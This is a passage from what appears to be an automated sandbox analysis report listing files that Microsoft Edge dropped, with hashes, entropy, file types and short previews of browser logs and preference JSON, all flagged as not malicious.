                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10833
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.207390619487114
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Y+6kz3o88bV+FCHQAr42aPcKJ:stqvstQcV3jee+IbGOQC42U
                                                                                                                                                                                                                                                                                                        MD5:5E8181FB52FFBFD0193B46A132D5A5F1
                                                                                                                                                                                                                                                                                                        SHA1:B440E604055A013D6DE2AF607F9DEB5D829BA308
                                                                                                                                                                                                                                                                                                        SHA-256:7D412A546A757D1BFFF0626B2D6CEF7A88FD0E83402E595A327A31928930D700
                                                                                                                                                                                                                                                                                                        SHA-512:24DCDA77A719B71BFF6BD7825C3A49007E403ED0F88993683B353974E37B1316992E94CF80C5C7973518FBC029BEEC24F2D93409D8ACD18C38F9187792352247
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.45949124614572384
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8Uu/ziKmz1CUcI5fc:TnUYVAKAFXX+8jg1vcEc
                                                                                                                                                                                                                                                                                                        MD5:2A5BBF02352C68682CC325C2FEE58A18
                                                                                                                                                                                                                                                                                                        SHA1:0E0816CCF72E455A73546C18BC3A327DBD22A745
                                                                                                                                                                                                                                                                                                        SHA-256:54F75875D832134A72321E0DE0B4E82F15D52BE4F908AE2DE65C015F694A0C66
                                                                                                                                                                                                                                                                                                        SHA-512:FD181816BF7FF68F83C69FC03092115ED9E2C36F813DFAA0FC4060E18F60C15F8630174232A1B8956A36485D437653FDBBDDBEE1CAFA46DBE252B8225C48E65A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.05422060562968252
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:GtStut4XUdhttStut4XUd/YR9XjhslotGLNl0ml/Vl/XoQXEl:Mt4Xozt4XfL1EjVl/PvoQ
                                                                                                                                                                                                                                                                                                        MD5:672BB6791FD5149A66A3A980ABCD2798
                                                                                                                                                                                                                                                                                                        SHA1:FD616ACED3C791A609423738088A8B26DC994DC4
                                                                                                                                                                                                                                                                                                        SHA-256:B53B36BEA6163E45A17D6302F499C26503F544641F5DADC582CD3B664D9FC89B
                                                                                                                                                                                                                                                                                                        SHA-512:9743B889C522DAB60067EDB104B621196E493EF8F577F60A5DD43F9FA8AC8F8A947B56929185FC18F1A9EE68CBAC202C3B6A4D9643DA439981F218EF106ED265
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):86552
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8709863863731893
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:hmzxUVlO+cZcbX+STn9VAKAFXX+H2VAKAFXX+DNxOqVAKAFXX+BTnUYVAKAFXX+x:hexUpcjS4NsFNsXO5NskNsY8
                                                                                                                                                                                                                                                                                                        MD5:D826B24586CD15F88AF513558983F659
                                                                                                                                                                                                                                                                                                        SHA1:146CEA251950D0D9776C9EDA62EE84F3F7E52F6C
                                                                                                                                                                                                                                                                                                        SHA-256:F63D452F86EEA7269AA2F75E0E323C616A59ABEB026D0D53B88871F47A7B5501
                                                                                                                                                                                                                                                                                                        SHA-512:FD126E342B720CB3346A633FCC7DE9E95A62323C0BE59C0CAB3C5B62594C827275665FE0459400824FFE88156A6B604C451DA7888814A1688FA4B8BF6F782CD2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):400
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.742001224668491
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:/XntM+ol3sedhOkHOuuuuuuuuuuuPcBsedhOU:Alc8VOuuuuuuuuuuux8x
                                                                                                                                                                                                                                                                                                        MD5:FCD18CEAF82A8BACA07BB57C9B00558D
                                                                                                                                                                                                                                                                                                        SHA1:06AD98E22AC7A8C57C6F3F264C6181E03337DD10
                                                                                                                                                                                                                                                                                                        SHA-256:74B52D1EBE2C8F9F952BDDD8CDF887D39F7CF2D7F6C148EE516D652EEB3049DB
                                                                                                                                                                                                                                                                                                        SHA-512:F415AE892982FC89E9EA9F64654DEAF5B1BE4510D56795226B2C1B2BF36AF99B5ADE4260C1F7EFB5E2D1F85D5DA4A2CFCC6F0E736F4F380C807A4C64935E081B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2080000674755365
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQcWq2PsZ23oH+TcwtfrK+IFUt8ORQVPdZmw+ORQVPvkwOsZ23oH+TcwtfrUeLJ:72BvkcYeb23FUt8O2V1/+O2Vn51cYeb5
                                                                                                                                                                                                                                                                                                        MD5:3014CF21D828CF47231D5FD3360DB671
                                                                                                                                                                                                                                                                                                        SHA1:D70CB8EA05541753B59F6B137F82A32FA7984D1D
                                                                                                                                                                                                                                                                                                        SHA-256:5227BF95548CF69AB675B562C65297FCA882486C120EBDBBA716D50952E2BA5F
                                                                                                                                                                                                                                                                                                        SHA-512:6177C6A1ACE87C3F9BBE68FFF7E8CFBB25F9E7EF6A18E2B49FA01A447D65EFE2D6AB32E6493AF194F6026B59825E91C0128F2767E8F00F637850DF5CF0817864
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.414 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-08:55:33.415 1eb4 Recovering log #3.2024/12/18-08:55:33.415 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):787
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.056995536428428
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJh/U/9Y+chRb3lZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhCe+cjl+t3IvB8s
                                                                                                                                                                                                                                                                                                        MD5:40B6B0DCC66AAA4C5682003FECC64A07
                                                                                                                                                                                                                                                                                                        SHA1:20AE0B55572A0B64D67E78FA0FE820B090DF9BA5
                                                                                                                                                                                                                                                                                                        SHA-256:A379994DD583940DB26212DF11696B01631E8ED821A74D5F03005DF261BFAEF2
                                                                                                                                                                                                                                                                                                        SHA-512:4BAC37BFC3C37906109EC375533D1AA68F55E2C5F92134728896846049C9107A91EE98A695F0A3B044B5D2F62BAA4C4B93EDD655E9DBDC2F2C31F808096FF12E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....{a...................19_.....f.F..................18_.......|.................37_.......&B.................38_........D.................39_..........................20_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.184490980376741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQQPOq2PsZ23oH+TcwtfrzAdIFUt8ORQ2PZmw+ORQ2dkwOsZ23oH+TcwtfrzILJ:72UOvkcYeb9FUt8O22P/+O22d51cYebS
                                                                                                                                                                                                                                                                                                        MD5:84F421BB043FF2A0ECD32C9FC07930A5
                                                                                                                                                                                                                                                                                                        SHA1:4BB856BA29E29BDC1BE95EB82920FCFF7033C93D
                                                                                                                                                                                                                                                                                                        SHA-256:ADCE7015B475F6F2208D4BAEED4DE03588B51C2FB03E44F48C7B91384D859C35
                                                                                                                                                                                                                                                                                                        SHA-512:E158C8A78DD58FC24FEE07F1D135BA868852D4C6D1B6D5072531145C28DCEA7C0600F00E49309834FE6ECEB72BB19F8F6F557233341E8E1CE2E84342B2057E37
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.410 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-08:55:33.412 1eb4 Recovering log #3.2024/12/18-08:55:33.412 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEflQRpvlt:/M/xT02zxPvlt
                                                                                                                                                                                                                                                                                                        MD5:39207D9A95B87E47F993FAACBCFFC8E5
                                                                                                                                                                                                                                                                                                        SHA1:1E8D5152277A9CC0AE7D06E3D8DFBF99CC154614
                                                                                                                                                                                                                                                                                                        SHA-256:598DBB02B106B495886F981062C9007EBD1EBC3A071865047AEDA16C9EEC5F77
                                                                                                                                                                                                                                                                                                        SHA-512:18FF8D60F639DA5DD6C1F19DA0428395447350B81C65008DB4001A2F282EE691647332BD8603CD6493AB57F89A3306849863AECC84A062DDB3D13C77BF22B8A8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEfljRp9t:/M/xT02zwp9t
                                                                                                                                                                                                                                                                                                        MD5:EB9BC7C3B184E9B99808B0742925F170
                                                                                                                                                                                                                                                                                                        SHA1:E68E9CDD6123B0224AD3828DB5693A44882DEFEA
                                                                                                                                                                                                                                                                                                        SHA-256:790B7200901072CC71E0F7D32F8A8E49A18FDA1A9A695CDEECB39B7504AAB10D
                                                                                                                                                                                                                                                                                                        SHA-512:486CCB0209EEBA1B4E953B6E6BC0A26DF760D5074B001B74DC9CB3AD26A5D0A30C4570FE44A385C5F0DD1FB26A0582DC6CA8D7FFF7276BBE5EAD2C5A2E1E6487
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEflsq:/M/xT02zNq
                                                                                                                                                                                                                                                                                                        MD5:044650889AC8842D4577A9C021A09483
                                                                                                                                                                                                                                                                                                        SHA1:894813AED2BAAA95FFA62713EE9B4E7638E1392A
                                                                                                                                                                                                                                                                                                        SHA-256:DD5F3B60DD3BA0E6F8B17FF114F508E76ED721E5A2B03D9B48AFDB5E8D36A2A9
                                                                                                                                                                                                                                                                                                        SHA-512:0E8A1111B2D3A1CB962ACA4BA1EB66FB0FDCB37437330E500435BE8531C6B19F5060F1D09F9A32E4DCE316904A1E51F3D221A87D8987B9635ED1608FFF47B94E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                        MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                        SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                        SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
